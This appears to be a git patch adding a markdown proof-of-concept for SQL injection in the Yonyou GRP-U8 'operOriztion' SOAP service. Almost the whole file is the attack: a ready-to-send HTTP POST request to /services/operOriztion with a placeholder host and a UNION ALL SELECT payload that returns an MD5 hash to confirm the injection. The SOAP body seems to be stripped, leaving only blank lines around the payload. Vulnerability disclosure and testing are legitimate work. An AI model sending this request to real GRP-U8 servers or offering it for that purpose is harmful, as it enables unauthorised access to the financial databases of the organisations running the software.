From 6701720d7ba6ad77d3e968c7539a4cc7466668ae Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 19 Apr 2024 22:15:01 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BGRP-U8-operOriztion?= =?UTF-8?q?=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友GRP-U8-operOriztion存在SQL注入漏洞.md | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 用友GRP-U8-operOriztion存在SQL注入漏洞.md diff --git a/用友GRP-U8-operOriztion存在SQL注入漏洞.md b/用友GRP-U8-operOriztion存在SQL注入漏洞.md new file mode 100644 index 0000000..9af3689 --- /dev/null +++ b/用友GRP-U8-operOriztion存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +## 用友GRP-U8-operOriztion存在SQL注入漏洞 + + +## poc +``` +POST /services/operOriztion HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Content-Type: text/xml;charset=UTF-8 +SOAPAction: "" + + + + + +' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))-- + + + +```